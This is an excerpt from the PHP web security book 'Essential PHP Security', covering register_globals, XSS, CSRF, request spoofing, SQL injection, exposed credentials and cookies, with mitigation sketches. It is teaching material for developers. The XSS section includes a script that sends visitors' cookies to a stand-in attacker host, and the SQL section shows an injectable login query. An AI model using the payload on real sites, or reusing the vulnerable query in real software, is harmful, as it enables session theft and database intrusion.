Essential PHP Security

By Chris Shiflett
Book Price: $29.95 USD
£20.95 GBP
PDF Price: $23.99



Table of Contents

Chapter 1: Introduction
PHP has grown from a set of tools for personal home page development to the world's most popular web programming language, and it now powers many of the Web's most frequented destinations. Along with such a transition come new concerns, such as performance, maintainability, scalability, reliability, and (most importantly) security.
Unlike language features such as conditional expressions and looping constructs, security is abstract. In fact, security is not a characteristic of a language as much as it is a characteristic of a developer. No language can prevent insecure code, although there are language features that can aid or hinder a security-conscious developer.
This book focuses on PHP and shows you how to write secure code by leveraging PHP's unique features. The concepts in this book, however, are applicable to any web development platform.
Web application security is a young and evolving discipline. This book teaches best practices that are theoretically sound, so that you can sleep at night instead of worrying about the new attacks and techniques that are constantly being developed by those with malicious intentions. However, it is wise to keep yourself informed of new advances in the field, and there are a few resources that can help:
http://phpsecurity.org/
This book's companion web site
http://phpsec.org/
The PHP Security Consortium
http://shiflett.org/
My personal web site and blog
This chapter provides the foundation for the rest of the book. It focuses on teaching you the principles and practices that are prerequisites for the lessons that follow.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
PHP Features
PHP has many unique features that make it very well-suited for web development. Common tasks that are cumbersome in other languages are a cinch in PHP, and this has both advantages and disadvantages. One feature in particular has attracted more attention than any other, and that feature is register_globals.
If you remember writing CGI applications in C in your early days of web application development, you know how tedious form processing can be. With PHP's register_globals directive enabled, the complexity of parsing raw form data is taken care of for you, and global variables are created from numerous remote sources. This makes writing PHP applications very easy and convenient, but it also poses a security risk.
In truth, register_globals is unfairly maligned. Alone, it does not create a security vulnerability—a developer must make a mistake. However, two primary reasons you should develop and deploy applications with register_globals disabled are that it:
  • Can increase the magnitude of a security vulnerability
  • Hides the origin of data, conflicting with a developer's responsibility to keep track of data at all times
All examples in this book assume register_globals to be disabled. Instead, I use superglobal arrays such as $_GET and $_POST. Using these arrays is nearly as convenient as relying on register_globals, and the slight lack of convenience is well worth the increase in security.
If you must develop an application that might be deployed in an environment in which register_globals is enabled, it is very important that you initialize all variables and set error_reporting to E_ALL (or E_ALL | E_STRICT) to alert yourself to the use of uninitialized variables. Any use of an uninitialized variable is almost certainly a security vulnerability when register_globals is enabled.
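As a minimal sketch of that advice (the $authorized flag and the hard-coded secret are hypothetical, chosen only for illustration), the following script raises the reporting level and initializes its flag before any condition can set it. On current PHP releases, E_ALL already covers what E_STRICT used to report.

```php
<?php

// Report every notice and warning, including reads of undefined variables.
error_reporting(E_ALL);

// Initialize explicitly. With register_globals enabled, a request such as
// ?authorized=1 could otherwise create this variable before the script runs.
$authorized = false;

// Hypothetical check: the expected value is hard-coded only for illustration.
if (isset($_POST['password']) && is_string($_POST['password'])
    && hash_equals('hypothetical-secret', $_POST['password']))
{
    $authorized = true;
}
```

Because $authorized always starts as false, the only way for it to become true is through the check in the script itself.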
Additional content appearing in this section has been removed.
Principles
You can adopt many principles to develop more secure applications. I have chosen a small, focused list of the principles that I consider to be most important to a PHP developer.
These principles are intentionally abstract and theoretical in nature. Their purpose is to provide a broad perspective that can guide you as you focus on the details. Consider them your road map.
Defense in Depth is a well-known principle among security professionals. It describes the fact that there is value in redundant safeguards, and history supports this.
The principle of Defense in Depth extends beyond programming. A skydiver who has ever needed to use a reserve canopy can attest to the value in having a redundant safeguard. After all, the main canopy is never meant to fail. A redundant safeguard can potentially save the day when the primary safeguard fails.
In the context of programming, adhering to Defense in Depth requires that you always have a backup plan. If a particular safeguard fails, there should be another to offer some protection. For example, it is a good practice to prompt a user to reauthenticate before performing some important action, even if there are no known flaws in your authentication logic. If an unauthenticated user is somehow impersonating another user, prompting for the user's password can potentially prevent the unauthenticated (and therefore unauthorized) user from performing a critical action.
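The reauthentication example can be sketched as follows. This is an illustration under assumptions, not the book's code: the function name and its parameters are hypothetical, and the stored hash is assumed to have been created with password_hash().

```php
<?php

/**
 * Decide whether a critical action may proceed.
 * The login check is the primary safeguard; the password re-check is the
 * redundant one that still holds if the first has been bypassed.
 */
function may_perform_critical_action(bool $logged_in, string $supplied_password, string $stored_hash): bool
{
    if (!$logged_in) {
        return false;
    }

    // Redundant safeguard: the current password must be supplied again.
    return password_verify($supplied_password, $stored_hash);
}
```

Both conditions must hold, so a flaw in the session logic alone is not enough to reach the critical action.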
Although Defense in Depth is a sound principle, be aware that security safeguards become more expensive and less valuable as they are accrued.
I used to drive a car that had a valet key. This key worked only in the ignition, so it could not be used to unlock the console, the trunk, or even the doors—it could be used only to start the car. I could give this key to someone parking my car (or simply leave it in the ignition), and I was assured that the key could be used for no other purpose.
Additional content appearing in this section has been removed.
Practices
Like the principles described in the previous section, there are many practices that you can employ to develop more secure applications. This list of practices is also small and focused to highlight the ones that I consider to be most important.
Some of these practices are abstract, but each has practical applications, which are described to clarify the intended use and purpose of each.
While user friendliness and security safeguards are not mutually exclusive, steps taken to increase security often decrease usability. While it's important to consider illegitimate uses of your applications as you write your code, it's also important to be mindful of your legitimate users. The appropriate balance can be difficult to achieve, and it's something that you have to determine for yourself—no one else can determine the best balance for your applications.
Try to use safeguards that are transparent to the user. If this isn't possible, try to use safeguards that are already familiar to the user (or likely to be). For example, providing a username and password to gain access to restricted information or services is an expected procedure.
When you suspect foul play, realize that you might be mistaken and act accordingly. For example, it is a common practice to prompt users to enter their password again whenever their identity is in question. This is a minor hassle to legitimate users but a substantial obstacle to an attacker. Technically, this is almost identical to prompting users to authenticate themselves again entirely, but the user experience is much friendlier.
There is very little to gain by logging users out entirely or chiding them about an alleged attack. These approaches degrade usability substantially when you make a mistake, and mistakes happen.
In this book, I focus on providing safeguards that are either transparent or expected, and I encourage careful and sensible reactions to suspected attacks.
Additional content appearing in this section has been removed.
Chapter 2: Forms and URLs
This chapter discusses form processing and the most common types of attacks that you need to be aware of when dealing with data from forms and URLs. You will learn about attacks such as cross-site scripting (XSS) and cross-site request forgeries (CSRF), as well as how to spoof forms and raw HTTP requests manually.
By the end of the chapter, you will not only see examples of these attacks, but also what practices you can employ to help prevent them.
Vulnerabilities such as cross-site scripting exist when you misuse tainted data. While the predominant source of input for most applications is the user, any remote entity can supply malicious data to your application. Thus, many of the practices described in this chapter are directly applicable to handling input from any remote entity, not just the user. See Chapter 1 for more information about input filtering.
Additional content appearing in this section has been removed.
Forms and Data
When developing a typical PHP application, the bulk of your logic involves data processing—tasks such as determining whether a user has logged in successfully, adding items to a shopping cart, and processing a credit card transaction.
Data can come from numerous sources, and as a security-conscious developer, you want to be able to easily and reliably distinguish between two distinct types of data:
  • Filtered data
  • Tainted data
Anything that you create yourself is trustworthy and can be considered filtered. An example of data that you create yourself is anything hardcoded, such as the email address in the following example:
    $email = 'chris@example.org';
This email address, chris@example.org, does not come from any remote source. This obvious observation is what makes it trustworthy. Any data that originates from a remote source is input, and all input is tainted, which is why it must always be filtered before you use it.
Tainted data is anything that is not guaranteed to be valid, such as form data submitted by the user, email retrieved from an IMAP server, or an XML document sent from another web application. In the previous example, $email is a variable that contains filtered data—the data is the important part, not the variable. A variable is just a container for the data, and it can always be overwritten later in the script with tainted data:
    $email = $_POST['email'];
Of course, this is why $email is called a variable. If you don't want the data to change, use a constant instead:
    define('EMAIL', 'chris@example.org');
When defined with the syntax shown here, EMAIL is a constant whose value is chris@example.org for the duration of the script, even if you attempt to assign it another value (perhaps by accident). For example, the following code outputs chris@example.org (the attempt to redefine EMAIL also generates a notice):
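A minimal sketch of that behavior follows. It is an illustration rather than the original listing: the second address is hypothetical, and the @ operator is used only to hide the diagnostic, which is a notice or a warning depending on the PHP version.

```php
<?php

define('EMAIL', 'chris@example.org');

// The second define() fails and returns false; the constant keeps its value.
// @ suppresses the "already defined" diagnostic for this demonstration.
$redefined = @define('EMAIL', 'rasmus@example.org');

echo EMAIL; // prints chris@example.org
```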
Additional content appearing in this section has been removed.
Semantic URL Attacks
Curiosity is the motivation behind many attacks, and semantic URL attacks are a perfect example. This type of attack involves the user modifying the URL in order to discover what interesting things can be done. For example, if the user chris clicks a link in your application and arrives at http://example.org/private.php?user=chris, it is reasonable to assume that he will try to see what happens when the value for user is changed. For example, he might visit http://example.org/private.php?user=rasmus to see if he can access someone else's information. While GET data is only slightly more convenient to manipulate than POST data, its increased exposure makes it a more frequent target, particularly for novice attackers.
Most vulnerabilities exist because of oversight, not because of any particular complexity associated with the exploits. Any experienced developer can easily recognize the danger in trusting a URL in the way just described, but this isn't always clear until someone points it out.
To better illustrate a semantic URL attack and how a vulnerability can go unnoticed, consider a web-based email application where users can log in and check their example.org email accounts. Any application that requires its users to log in needs to provide a password reminder mechanism. A common technique for this is to ask the user a question that a random attacker is unlikely to know (the mother's maiden name is a common query, but allowing the user to specify a unique question and its answer is better) and email a new password to the email address already stored in the user's account.
With a web-based email application, an email address may not already be stored, so a user who answers the verification question may be asked to provide one (the purpose being not only to send the new password to this address, but also to collect an alternative address for future use). The following form asks a user for an alternative email address, and the account name is identified in a hidden form variable:
    <form action="reset.php" method="GET">
    <input type="hidden" name="user" value="chris" />
    <p>Please specify the email address where you want your new password sent:</p>
    <input type="text" name="email" /><br />
    <input type="submit" value="Send Password" />
    </form>
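The weakness in this form is that the account name travels in the request, where the user can change it. One way to avoid that, sketched here under assumptions not in the original (the session keys verified and user, and the function name, are hypothetical), is for reset.php to ignore the account name in the request and rely on what the server recorded when the verification question was answered:

```php
<?php

/**
 * Return the account whose password may be reset, or null if the visitor
 * has not passed verification. The account name comes from server-side
 * session data, never from $_GET or a hidden form field.
 */
function account_for_reset(array $session): ?string
{
    if (empty($session['verified'])) {
        return null;
    }

    if (!isset($session['user']) || !is_string($session['user'])) {
        return null;
    }

    return $session['user'];
}

// Typical use inside reset.php, after session_start():
// $user = account_for_reset($_SESSION);
```

With this approach, changing user=chris to user=rasmus in the URL has no effect, because the value is never read.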
Additional content appearing in this section has been removed.
File Upload Attacks
Sometimes you want to give users the ability to upload files in addition to standard form data. Because files are not sent in the same way as other form data, you must specify a particular type of encoding—multipart/form-data:
    <form action="upload.php" method="POST" enctype="multipart/form-data">
An HTTP request that includes both regular form data and files has a special format, and this enctype attribute is necessary for the browser's compliance.
The form element you use to allow the user to select a file for upload is very simple:
    <input type="file" name="attachment" />
The rendering of this form element varies from browser to browser. Traditionally, the interface includes a standard text field as well as a browse button, so that the user can either enter the path to the file manually or browse for it. In Safari, only the browse option is available. Luckily, the behavior from a developer's perspective is the same.
To better illustrate the mechanics of a file upload, here's an example form that allows a user to upload an attachment:
    <form action="upload.php" method="POST" enctype="multipart/form-data">
    <p>Please choose a file to upload:
    <input type="hidden" name="MAX_FILE_SIZE" value="1024" />
    <input type="file" name="attachment" /><br />
    <input type="submit" value="Upload Attachment" /></p>
    </form>
The hidden form variable MAX_FILE_SIZE indicates the maximum file size (in bytes) that the browser should allow. As with any client-side restriction, this is easily defeated by an attacker, but it can act as a guide for your legitimate users. The restriction needs to be enforced on the server side in order to be considered reliable.
The PHP directive upload_max_filesize can be used to control the maximum file size allowed, and post_max_size can potentially restrict this as well, because file uploads are included in the POST data.
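Server-side enforcement might look like the following sketch. The function name and the 1024-byte limit in the usage comment are assumptions for illustration; the checks rely only on the standard fields of a $_FILES entry and on is_uploaded_file().

```php
<?php

/**
 * Server-side check of one entry from $_FILES.
 * $max_bytes is a limit chosen by the application.
 */
function upload_is_acceptable(array $file, int $max_bytes): bool
{
    // PHP reports its own limit violations (such as upload_max_filesize) here.
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }

    // Enforce the application's limit regardless of MAX_FILE_SIZE in the form.
    if (!isset($file['size']) || !is_int($file['size']) || $file['size'] > $max_bytes) {
        return false;
    }

    // Confirm that the temporary file really came from an HTTP upload.
    return isset($file['tmp_name'])
        && is_string($file['tmp_name'])
        && is_uploaded_file($file['tmp_name']);
}

// Typical use inside upload.php:
// if (isset($_FILES['attachment']) && upload_is_acceptable($_FILES['attachment'], 1024)) { ... }
```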
The receiving script, upload.php
Additional content appearing in this section has been removed.
Cross-Site Scripting
Cross-site scripting (XSS) is deservedly one of the best known types of attacks. It plagues web applications on all platforms, and PHP applications are certainly no exception.
Any application that displays input is at risk—web-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some type—this is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists.
Consider a web application that allows users to enter comments on each page. The following form can be used to facilitate this:
    <form action="comment.php" method="POST">
    <p>Name: <input type="text" name="name" /><br />
    Comment: <textarea name="comment" rows="10" cols="60"></textarea><br />
    <input type="submit" value="Add Comment" /></p>
    </form>
The application displays comments to other users who visit the page. For example, code similar to the following can be used to output a single comment ($comment) and corresponding name ($name):
    <?php

    echo "<p>$name writes:<br />";
    echo "<blockquote>$comment</blockquote></p>";

    ?>
This approach places a significant amount of trust in the values of both $comment and $name. Imagine that one of them contained the following:
    <script>
    document.location =
      'http://evil.example.org/steal.php?cookies=' +
      document.cookie
    </script>
If this comment is sent to your users, it is no different than if you had allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to evil.example.org, and the receiving script (steal.php) can access all of the cookies in $_GET['cookies'].
This is a common mistake, and it is proliferated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output tainted, unescaped data, you can simply make sure that you filter input and escape output as described in Chapter 1.
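Escaping the output can be sketched as follows. The function name is hypothetical, the page is assumed to be served as UTF-8, and input filtering is assumed to have happened already; the sketch covers only the output step.

```php
<?php

/**
 * Build the comment markup with both values escaped for an HTML context.
 * Assumes the page is served as UTF-8.
 */
function render_comment(string $name, string $comment): string
{
    $html = array(
        'name'    => htmlspecialchars($name, ENT_QUOTES, 'UTF-8'),
        'comment' => htmlspecialchars($comment, ENT_QUOTES, 'UTF-8'),
    );

    return "<p>{$html['name']} writes:</p>"
         . "<blockquote>{$html['comment']}</blockquote>";
}
```

A comment containing a script element is then displayed as text, because its angle brackets reach the browser as &lt; and &gt; rather than as markup.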
Additional content appearing in this section has been removed.
Cross-Site Request Forgeries
A cross-site request forgery (CSRF) is a type of attack that allows an attacker to send arbitrary HTTP requests from a victim. The victim is an unknowing accomplice—the forged requests are sent by the victim, not the attacker. Thus, it is very difficult to determine when a request represents a CSRF attack. In fact, if you have not taken specific steps to mitigate the risk of CSRF attacks, your applications are most likely vulnerable.
Consider a sample application that allows users to buy items—either pens or pencils. The interface includes the following form:

    <form action="buy.php" method="POST">
    <p>
    Item:
    <select name="item">
      <option value="pen">pen</option>
      <option value="pencil">pencil</option>
    </select><br />
    Quantity: <input type="text" name="quantity" /><br />
    <input type="submit" value="Buy" />
    </p>
    </form>
An attacker can use your application as intended to do some basic profiling. For example, an attacker can visit this form to discover that the form elements are item and quantity. The attacker also learns that the expected values of item are pen and pencil.
The buy.php script processes this information:
    <?php

    session_start();
    $clean = array();

    if (isset($_REQUEST['item']) && isset($_REQUEST['quantity']))
    {
      /* Filter Input ($_REQUEST['item'], $_REQUEST['quantity']) */

      if (buy_item($clean['item'], $clean['quantity']))
      {
        echo '<p>Thanks for your purchase.</p>';
      }
      else
      {
        echo '<p>There was a problem with your order.</p>';
      }
    }

    ?>
An attacker can first use your form as intended to observe the behavior. For example, after purchasing a single pen, the attacker knows to expect a message of thanks when a purchase is successful. After noting this, the attacker can then try to see whether GET data can be used to perform the same action by visiting the following URL:
    http://store.example.org/buy.php?item=pen&quantity=1
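A common mitigation, sketched here as an assumption rather than as the book's own listing, is to require a secret token that is stored in the session and included in the form, and to read the submission from $_POST instead of $_REQUEST so that a plain URL no longer triggers a purchase. The function names and the token key are hypothetical.

```php
<?php

/** Create a token, store it in the session data, and return it for the form. */
function csrf_issue_token(array &$session): string
{
    $session['token'] = bin2hex(random_bytes(32));

    return $session['token'];
}

/** True only when the submitted token matches the one stored for this session. */
function csrf_token_is_valid(array $session, $submitted): bool
{
    return isset($session['token'])
        && is_string($session['token'])
        && is_string($submitted)
        && hash_equals($session['token'], $submitted);
}

// In the form:  <input type="hidden" name="token" value="(issued token)" />
// In buy.php:   if (!csrf_token_is_valid($_SESSION, $_POST['token'] ?? null)) { /* reject */ }
```

An attacker who forges a request from another site does not know the victim's token, so the forged request fails the check.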
Additional content appearing in this section has been removed.
Spoofed Form Submissions
Spoofing a form is almost as easy as manipulating a URL. After all, the submission of a form is just an HTTP request sent by the browser. The request format is somewhat determined by the form, and some of the data within the request is provided by the user.
Most forms specify an action as a relative URL:
    <form action="process.php" method="POST">
The browser requests the URL identified by the action attribute upon form submission, and it uses the current URL to resolve relative URLs. For example, if the previous form is in the response to a request for http://example.org/path/to/form.php, the URL requested after the user submits the form is http://example.org/path/to/process.php.
Knowing this, it is easy to realize that you can indicate an absolute URL, allowing the form to reside anywhere:
    <form action="http://example.org/path/to/process.php" method="POST">
This form can be located anywhere, and a request sent using this form is identical to a request sent using the original form. Knowing this, an attacker can view the source of a page, save that source to his server, and modify the action attribute to specify an absolute URL. With these modifications in place, the attacker can alter the form as desired—whether to eliminate a maxlength restriction, eliminate client-side data validation, alter the value of hidden form elements, or modify form element types to provide more flexibility. These modifications help an attacker to submit arbitrary data to the server, and the process is very easy and convenient—the attacker doesn't have to be an expert.
Although it might seem surprising, form spoofing isn't something you can prevent, nor is it something you should worry about. As long as you properly filter input, users have to abide by your rules. However they choose to do so is irrelevant.
If you experiment with this technique, you may notice that most browsers include a Referer header that indicates the previously requested parent resource. In this case, Referer indicates the URL of the form. Resist the temptation to use this information to distinguish between requests sent using your form and those sent using a spoofed form. As demonstrated in the next section, HTTP headers are also easy to manipulate, and the expected value of
Additional content appearing in this section has been removed.
Spoofed HTTP Requests
A more sophisticated attack than spoofing forms is spoofing a raw HTTP request. This gives an attacker complete control and flexibility, and it further shows that no data provided by the user should be blindly trusted.
To demonstrate this, consider a form located at http://example.org/form.php:
    <form action="process.php" method="POST">
    <p>Please select a color:
    <select name="color">
      <option value="red">Red</option>
      <option value="green">Green</option>
      <option value="blue">Blue</option>
    </select><br />
    <input type="submit" value="Select" /></p>
    </form>
If a user chooses Red from the list and clicks Select, the browser sends an HTTP request:
    POST /process.php HTTP/1.1
    Host: example.org
    User-Agent: Mozilla/5.0 (X11; U; Linux i686)
    Referer: http://example.org/form.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 9

    color=red
Seeing that most browsers include the referring URL this way in the request, you may be tempted to write logic that checks $_SERVER['HTTP_REFERER'] to prevent form spoofing. This would indeed prevent an attack that is mounted with a standard browser, but an attacker is not necessarily hindered by such minor inconveniences. By modifying the raw HTTP request, an attacker has complete control over the value of HTTP headers, GET and POST data, and quite literally, everything within the HTTP request.
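Rather than inspecting Referer, the server can simply check the submitted value against the values the form offers. A minimal sketch, in which the function name is hypothetical and the list mirrors the three options in the form above:

```php
<?php

/** Return the color if it is one the form offers, otherwise null. */
function filter_color($input): ?string
{
    $allowed = array('red', 'green', 'blue');

    return (is_string($input) && in_array($input, $allowed, true)) ? $input : null;
}

$clean = array();
$color = filter_color($_POST['color'] ?? null);

if ($color !== null)
{
    $clean['color'] = $color;
}
```

However the request was produced, only one of the three expected values can end up in $clean.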
How can an attacker modify the raw HTTP request? The process is simple. Using the telnet utility available on most platforms, you can communicate directly with a remote web server by connecting to the port on which the web server is listening (typically port 80). The following is an example of manually requesting the front page of http://example.org/ using this technique:
    $ telnet example.org 80
    Trying 192.0.34.166...
    Connected to example.org (192.0.34.166).
    Escape character is '^]'.
    GET / HTTP/1.1
    Host: example.org
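The same kind of request can also be assembled in a script. The sketch below is an illustration with a hypothetical function name; it only builds the request text for the color form shown earlier, and sending it over a socket is left out.

```php
<?php

/**
 * Assemble a raw HTTP/1.1 POST request as a string. Every header value,
 * including Referer, is whatever the caller chooses.
 */
function build_post_request(string $host, string $path, array $fields, array $headers = array()): string
{
    $body = http_build_query($fields);

    $lines = array("POST $path HTTP/1.1", "Host: $host");
    foreach ($headers as $name => $value)
    {
        $lines[] = "$name: $value";
    }
    $lines[] = 'Content-Type: application/x-www-form-urlencoded';
    $lines[] = 'Content-Length: ' . strlen($body);
    $lines[] = 'Connection: close';

    // A blank line separates the headers from the body.
    return implode("\r\n", $lines) . "\r\n\r\n" . $body;
}

$request = build_post_request(
    'example.org',
    '/process.php',
    array('color' => 'red'),
    array('Referer' => 'http://example.org/form.php')
);
```

Nothing in the resulting text distinguishes it from a request sent by a browser, which is why header values cannot serve as proof of origin.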
Additional content appearing in this section has been removed.
Chapter 3: Databases and SQL
PHP's role is often that of a conduit between various data sources and the user. In fact, some people describe PHP more as a platform than just a programming language. To this end, PHP is frequently used to interact with a database.
PHP is well suited for this role, particularly due to the extensive list of databases with which it can communicate. The following list is a small sample of the databases that PHP supports:
  • DB2
  • ODBC
  • SQLite
  • InterBase
  • Oracle
  • Sybase
  • MySQL
  • PostgreSQL
  • DBM
As with any remote data store, databases carry their own risks. Although database security is not a topic that this book covers, the security of the database is something to keep in mind, particularly concerning whether to consider data obtained from the database as input.
As discussed in Chapter 1, all input must be filtered, and all output must be escaped. When dealing with a database, this means that all data coming from the database must be filtered, and all data going to the database must be escaped.
A common mistake is to forget that a SELECT query is data that is being sent to the database. Although the purpose of the query is to retrieve data, the query itself is output.
Many PHP developers fail to filter data coming from the database because only filtered data is stored therein. While the security risk inherent in this approach is slight, it is still not a best practice and not an approach that I recommend. This approach places trust in the security of the database, and it also violates the principle of Defense in Depth. Remember, redundant safeguards have value, and this is a perfect example. If malicious data is somehow injected into the database, your filtering logic can catch it, but only if such logic exists.
This chapter covers a few other topics of concern, including exposed access credentials and SQL injection. SQL injection is of particular concern due to the frequency with which such vulnerabilities are discovered in popular PHP applications.
Additional content appearing in this section has been removed.
Exposed Access Credentials
One of the primary concerns related to the use of a database is the disclosure of the database access credentials—the username and password. For convenience, these might be stored in a file named db.inc:
    <?php

    $db_user = 'myuser';
    $db_pass = 'mypass';
    $db_host = '127.0.0.1';

    $db = mysql_connect($db_host, $db_user, $db_pass);

    ?>
Both myuser and mypass are sensitive, so they warrant particular attention. Their presence in your source code poses a risk, but it is an unavoidable one. Without them, your database cannot be protected with a username and password.
If you look at a default httpd.conf (Apache's configuration file), you can see that the default type is text/plain. This poses a particular risk when a file such as db.inc is stored within document root. Every resource within document root has a corresponding URL, and because Apache does not typically have a particular content type associated with .inc files, a request for such a resource will return the source in plain text (the default type), including the database access credentials.
To further explain this risk, consider a server with a document root of /www. If db.inc is stored in /www/inc, it has its own URL—http://example.org/inc/db.inc (assuming that example.org is the host). Visiting this URL displays the source of db.inc in plain text. Thus, your access credentials risk exposure if db.inc is stored in any subdirectory of /www, document root.
The best solution to this particular problem is to store your includes outside of document root. You do not need to have them in any particular place in the filesystem to be able to include or require them—all you need to do is ensure that the web server has read privileges. Therefore, it is an unnecessary risk to place them within document root, and any method that attempts to minimize this risk without relocating all includes outside of document root is subpar. In fact, you should place only resources that absolutely must be accessible via URL within document root. It is, after all, a public directory.
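As a small deployment check, the following sketch tests whether a given include path falls under document root. The function name and the /usr/local/inc location are hypothetical, and both paths are assumed to be absolute and already normalized.

```php
<?php

/**
 * Report whether $file lies outside $docroot. Both paths are assumed to be
 * absolute and already normalized (no "..", no symlinks); this is a plain
 * string comparison, not a filesystem lookup.
 */
function is_outside_document_root(string $file, string $docroot): bool
{
    $root = rtrim($docroot, '/') . '/';

    return strncmp($file, $root, strlen($root)) !== 0;
}

// Hypothetical layout: document root is /www, includes live in /usr/local/inc.
// require '/usr/local/inc/db.inc';
```

A file stored at /usr/local/inc/db.inc has no corresponding URL, yet it can still be included by any script the web server runs.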
Additional content appearing in this section has been removed.
SQL Injection
SQL injection is one of the most common vulnerabilities in PHP applications. What is particularly surprising about this fact is that an SQL injection vulnerability requires two failures on the part of the developer—a failure to filter data as it enters the application (filter input), and a failure to escape data as it is sent to the database (escape output). Neither of these crucial steps should ever be omitted, and both steps deserve particular attention in an attempt to minimize errors.
SQL injection typically requires some speculation and experimentation on the part of the attacker—it is necessary to make an educated guess about your database schema (assuming, of course, that the attacker does not have access to your source code or database schema). Consider a simple login form:
    <form action="/login.php" method="POST">
    <p>Username: <input type="text" name="username" /></p>
    <p>Password: <input type="password" name="password" /></p>
    <p><input type="submit" value="Log In" /></p>
    </form>
Figure 3-1 shows how this form looks when rendered in a browser.
Figure 3-1: A basic login form displayed in a browser
An attacker presented with this form begins to speculate about the type of query that you might be using to validate the username and password provided. By viewing the HTML source, the attacker can begin to make guesses about your habits regarding naming conventions. A common assumption is that the names used in the form match columns in the database table. Of course, making sure that these differ is not a reliable safeguard.
A good first guess, as well as the actual query that I will use in the following discussion, is as follows:
<?php

$password_hash = md5($_POST['password']);

$sql = "SELECT count(*)
        FROM   users
        WHERE  username = '{$_POST['username']}'
        AND    password = '$password_hash'";

?>
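To make the risk concrete, the sketch below rebuilds the same query inside a hypothetical helper, build_login_query(), so that the effect of a crafted username can be inspected as a string. It then shows one common alternative, a PDO prepared statement, which is a swapped-in technique and not necessarily the remedy the book goes on to describe. Both function names, and the assumption that a PDO connection is available, are illustrative:

```php
<?php

/**
 * Reproduce the query from the discussion above so the effect of
 * unescaped input can be inspected. For illustration only.
 */
function build_login_query(string $username, string $password): string
{
    $password_hash = md5($password);

    return "SELECT count(*)
        FROM   users
        WHERE  username = '{$username}'
        AND    password = '{$password_hash}'";
}

/**
 * The same check with bound parameters: bound values are treated as data,
 * never as SQL syntax, so quotes in them cannot change the query.
 */
function count_matching_users(PDO $db, string $username, string $password): int
{
    $stmt = $db->prepare(
        'SELECT count(*)
         FROM   users
         WHERE  username = :username
         AND    password = :password'
    );
    $stmt->execute([
        ':username' => $username,
        ':password' => md5($password), // mirrors the hashing in the query above
    ]);

    return (int) $stmt->fetchColumn();
}

// The single quote closes the string literal early, and "--" followed by a
// space starts an SQL comment, so the rest of that line is ignored.
$injected = build_login_query("chris' -- ", 'anything');
```

Printing $injected shows the username condition ending in 'chris' followed by a comment marker, which is the kind of change to the query that an attacker is probing for.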
Exposed Data
Another concern regarding databases is the exposure of sensitive data. Whether you're storing credit card numbers, social security numbers, or something else, you want to make sure that the data in your database is safe.
While protecting the security of the database itself is outside the scope of this book (and most likely outside a PHP developer's responsibility), you can encrypt the data that is most sensitive, so that a compromise of the database is less disastrous as long as the key is kept safe. See Appendix C for more information about cryptography.
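One way to encrypt a sensitive field before it is stored is sketched below. It assumes PHP 8 with the OpenSSL extension and uses AES-256-GCM, which is not necessarily the approach taken in Appendix C. The function names and the storage format (nonce, tag, and ciphertext concatenated and base64-encoded) are assumptions made for this example:

```php
<?php

/**
 * Encrypt a value before storing it.
 * Returns base64(nonce . tag . ciphertext).
 * $key must be 32 random bytes kept outside the database.
 */
function encrypt_field(string $plaintext, string $key): string
{
    $nonce = random_bytes(12); // 96-bit nonce, fresh for every message
    $tag = '';
    $ciphertext = openssl_encrypt(
        $plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $nonce, $tag
    );
    if ($ciphertext === false) {
        throw new RuntimeException('Encryption failed');
    }

    return base64_encode($nonce . $tag . $ciphertext);
}

/**
 * Reverse encrypt_field(). Throws if the data is malformed, was modified,
 * or was encrypted with a different key.
 */
function decrypt_field(string $stored, string $key): string
{
    $raw = base64_decode($stored, true);
    if ($raw === false || strlen($raw) < 28) {
        throw new RuntimeException('Malformed ciphertext');
    }

    $plaintext = openssl_decrypt(
        substr($raw, 28),      // ciphertext
        'aes-256-gcm',
        $key,
        OPENSSL_RAW_DATA,
        substr($raw, 0, 12),   // nonce
        substr($raw, 12, 16)   // authentication tag
    );
    if ($plaintext === false) {
        throw new RuntimeException('Decryption failed');
    }

    return $plaintext;
}
```

The protection is only as good as the handling of the key: if the key is stored in the same database as the encrypted data, a compromise of the database exposes both.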
Chapter 4: Sessions and Cookies
This chapter discusses sessions and the inherent risks associated with stateful web applications. You will first learn the fundamentals of state, cookies, and sessions; then I will discuss several concerns—cookie theft, exposed session data, session fixation, and session hijacking—along with practices that you can employ to help prevent them.
The rumors are true: HTTP is a stateless protocol. This description recognizes the lack of association between any two HTTP requests. Because the protocol does not provide any method that the client can use to identify itself, the server cannot distinguish between clients.
While the stateless nature of HTTP has some important benefits—after all, maintaining state requires some overhead—it presents a unique challenge to developers who need to create stateful web applications. With no way to identify the client, it is impossible to determine whether the user is already logged in, has items in a shopping cart, or needs to register.
An elegant solution to this problem, originally conceived by Netscape, is a state management mechanism called cookies. Cookies are an extension of the HTTP protocol. More precisely, they consist of two HTTP headers: the Set-Cookie response header and the Cookie request header.
When a client sends a request for a particular URL, the server can opt to include a Set-Cookie header in the response. This is a request for the client to include a corresponding Cookie header in its future requests. Figure 4-1 illustrates this basic exchange.
Figure 4-1: A complete cookie exchange that involves two HTTP transactions
If you use this concept to allow a unique identifier to be included in each request (in a Cookie header), you can begin to uniquely identify clients and associate their requests together. This is all that is required for state, and this is the primary use of the mechanism.
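The two headers can be illustrated with a pair of small helpers. This is a sketch under simplifying assumptions: only a single name/value pair is formatted, cookie attributes such as the path and expiry are ignored, and the function names are hypothetical. In practice PHP does this work for you through setcookie() and $_COOKIE:

```php
<?php

/** Build a Set-Cookie response header line for one name/value pair. */
function format_set_cookie(string $name, string $value): string
{
    // Encode the value so that separators such as ";" cannot appear in it.
    return 'Set-Cookie: ' . $name . '=' . rawurlencode($value);
}

/** Parse the value of a Cookie request header into an associative array. */
function parse_cookie_header(string $header): array
{
    $cookies = [];

    // Pairs are separated by semicolons: "name1=value1; name2=value2"
    foreach (explode(';', $header) as $pair) {
        $parts = explode('=', trim($pair), 2);
        if (count($parts) === 2 && $parts[0] !== '') {
            $cookies[$parts[0]] = rawurldecode($parts[1]);
        }
    }

    return $cookies;
}
```

The first function corresponds to what the server sends in the first transaction, and the second to what it reads back from the client in every later request.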
The best reference for cookies is still the specification provided by Netscape at http://wp.netscape.com/newsref/std/cookie_spec.html
Cookie Theft
